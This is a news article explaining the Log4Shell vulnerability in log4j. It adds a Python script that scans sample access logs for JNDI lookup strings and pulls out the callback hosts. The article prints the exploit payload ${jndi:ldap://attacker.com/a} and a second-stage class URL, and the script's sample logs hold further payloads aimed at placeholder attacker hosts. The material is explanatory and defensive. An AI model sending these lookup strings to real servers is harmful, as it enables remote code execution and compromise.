Computer security teams all around the world are scrambling to patch a previously unknown vulnerability called Log4Shell, which has the potential to let hackers compromise millions of devices across the internet.
The vulnerability allows remote code execution on vulnerable servers, giving an attacker the ability to load and run malware that completely compromises the machine.
The vulnerability is found in log4j, an open-source logging library used by apps and services across the internet. Logging is a process where applications keep a running list of activities they have performed which can later be reviewed in case of error.
Almost every network security system runs some kind of logging process, which gives popular libraries like log4j an enormous reach.
The exploit was first seen on sites hosting Minecraft servers, which discovered that attackers could trigger the vulnerability by posting chat messages.
A tweet from security analysis company GreyNoise reported that the company had already detected numerous hosts scanning the internet for machines vulnerable to the exploit.
GreyNoise is detecting a sharply increasing number of hosts opportunistically exploiting Apache Log4J CVE-2021-44228. Exploitation occurring from ~100 distinct hosts, almost all of which are Tor exit nodes. Tags available to all users and customers now. https://t.co/JF3tUkpIrq pic.twitter.com/CTMi0IWQ5j
— GreyNoise (@GreyNoiseIO) December 10, 2021
Below is a step-by-step example of how Log4Shell can be exploited on vulnerable servers:
- Data from the user is sent to the server, over HTTP or any other protocol.
- The server logs the data in the request, which contains the malicious payload: ${jndi:ldap://attacker.com/a} (where attacker.com is an attacker-controlled server).
- The Log4j vulnerability is triggered by this payload, and the server makes a request to attacker.com via the Java Naming and Directory Interface (JNDI).
- The response contains a path to a remote Java class file (e.g. http://second-stage.attacker.com/Exploit.class), which is loaded into the server process.
- This injected payload triggers a second stage and allows the attacker to execute arbitrary code.
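Because the chain above begins with the lookup string landing in a logged field, the first place a defender can catch it is in the request logs themselves. The following is an added example, not code from the article or from the Log4j project: it scans constructed web-server access-log lines (attacker.example and callback.example are placeholder hosts) for the ${jndi:...} lookup form the article describes, accepts any JNDI scheme rather than only ldap, percent-decodes each line first so a payload in a query string is compared in the form the application would see, and extracts the callback host the vulnerable server would have been made to contact in step 3.

```python
"""Scan web-server request logs for the Log4Shell lookup string described in
the article and pull out the callback host the vulnerable server would contact.
Added example; the log lines below are constructed, not taken from the article."""
import re
from typing import List, Set
from urllib.parse import unquote

# Constructed sample access-log lines. The payload shape is the one the
# article describes; attacker.example and callback.example are placeholders.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [10/Dec/2021:12:00:01 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://attacker.example/a}"',
    '10.0.0.7 - - [10/Dec/2021:12:00:03 +0000] "GET /index.html HTTP/1.1" 200 4096 "-" "curl/7.68.0"',
    '10.0.0.3 - - [10/Dec/2021:12:00:04 +0000] "GET /?q=${jndi:rmi://attacker.example/x} HTTP/1.1" 400 0 "-" "-"',
    '10.0.0.4 - - [10/Dec/2021:12:00:05 +0000] "GET /?x=%24%7Bjndi%3Aldap%3A%2F%2Fcallback.example%2Fb%7D HTTP/1.1" 200 12 "-" "-"',
]

# A JNDI lookup as log4j would interpret it: ${jndi:<scheme>://<host>...}.
# The article shows the ldap scheme; the scheme group is left open so other
# JNDI providers (rmi, dns, ...) are caught as well.
JNDI_LOOKUP = re.compile(
    r"\$\{\s*jndi\s*:\s*(?P<scheme>[a-z]+)\s*:\s*//(?P<host>[^/}\s:]+)",
    re.IGNORECASE,
)


def normalize(line: str) -> str:
    """Undo URL percent-encoding so a payload carried in a query string is
    matched in the same form the application (and log4j) would see it."""
    return unquote(line)


def is_suspicious(line: str) -> bool:
    """True when the line contains a JNDI lookup string in any logged field
    (path, query string, User-Agent, or anything else the server records)."""
    return JNDI_LOOKUP.search(normalize(line)) is not None


def scan_log_lines(lines: List[str]) -> List[dict]:
    """Return one finding per matching line: line number, JNDI scheme and the
    host the vulnerable server would be made to contact."""
    findings = []
    for line_no, line in enumerate(lines, start=1):
        match = JNDI_LOOKUP.search(normalize(line))
        if match is None:
            continue
        findings.append({
            "line_no": line_no,
            "scheme": match.group("scheme").lower(),
            "host": match.group("host"),
        })
    return findings


def callback_hosts(lines: List[str]) -> Set[str]:
    """Distinct hosts named in the lookups. These are what to look for in
    egress firewall and DNS logs (step 3 of the chain) and what to block."""
    return {finding["host"] for finding in scan_log_lines(lines)}


if __name__ == "__main__":
    for finding in scan_log_lines(SAMPLE_LOG_LINES):
        print(f"line {finding['line_no']}: jndi scheme={finding['scheme']} "
              f"callback host={finding['host']}")
    print("callback hosts to check in egress logs:",
          sorted(callback_hosts(SAMPLE_LOG_LINES)))
```

A match in the request log only tells you the string was sent; whether the server actually reached out (step 3) is confirmed by an outbound LDAP, RMI or DNS connection from the application host to one of the extracted callback hosts, so the two log sources should be correlated rather than read alone.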
Researchers say they found evidence that Log4Shell can be exploited in servers operated by Apple, Cloudflare, Twitter, Valve, Tencent, and other large companies. The vulnerability is said to be particularly easy to exploit in Minecraft servers, too, with some proof-of-concept attacks using nothing more than the in-game chat.
The Computer Emergency Response Team (CERT) for New Zealand, Deutsche Telekom’s CERT, the security firm GreyNoise, and others have all reported that attackers are actively scanning for servers vulnerable to Log4Shell attacks.